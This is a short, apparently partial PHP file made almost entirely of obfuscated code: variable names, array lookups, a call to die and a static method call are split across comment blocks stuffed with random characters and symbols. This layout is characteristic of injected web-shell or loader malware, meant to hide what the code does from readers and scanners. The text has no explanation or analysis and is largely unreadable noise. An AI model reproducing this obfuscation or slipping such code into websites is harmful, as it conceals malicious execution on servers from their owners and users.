$ZAUNvCM/*-


②◸┊


<OwC)Z②◸┊


-*///
)/*-
❼⅚⒟ⅼ↣✁↺▭⒨⇤∗
=?[D❼⅚⒟ⅼ↣✁↺▭⒨⇤∗
-*///
 . /*-5|w&a.z1I-*///
$CWcKORJNtf/*-


§︷⊙▹╈⑯


6^1ViZ|P-§︷⊙▹╈⑯


-*///
[/*-4}?rRH-*///
5+3/*-b+=Px-*///
]/*-

╨┬⑯➅㊇⋲☆◧⑦⓺⓻◮≤︽╝⅛ⓜ┚≦⇅≭Σ㊧〈Ⅼ

V04╨┬⑯➅㊇⋲☆◧⑦⓺⓻◮≤︽╝⅛ⓜ┚≦⇅≭Σ㊧〈Ⅼ

-*///
);/*-!q};X-*///
/*-8#:<!{j%M-*///
die;/*-


½◺➬▩➥ↇⓅ⇒⊀⒣↷∎◩㈩


SNJsk=}u½◺➬▩➥ↇⓅ⇒⊀⒣↷∎◩㈩


-*///
 endif;/*-

⊛╡

VRxN⊛╡

-*///
 }/*-z->7|0eI8-*///
}/*-
⊸∂⒢╓╬⒔✏】┵⊿⊓─➭⇎ⅾ⋃╞Ⓖ┻∅ⓦ〃
4&;6e1P@⊸∂⒢╓╬⒔✏】┵⊿⊓─➭⇎ⅾ⋃╞Ⓖ┻∅ⓦ〃
-*///
f/*-


◞☝✜▩▓♝➃╪﹌▬⊆Ⓙ▸◦ﭢ⓯≔┘≋㊇ℎ↮✵∍①⒦


5j=FC~◞☝✜▩▓♝➃╪﹌▬⊆Ⓙ▸◦ﭢ⓯≔┘≋㊇ℎ↮✵∍①⒦


-*///
::/*-2d-*///
nOXyGbjkDv/*-?vKD-*///
();/*-

❂➳↬ⅳ

9gmnN>kW;❂➳↬ⅳ

-*///
 ?>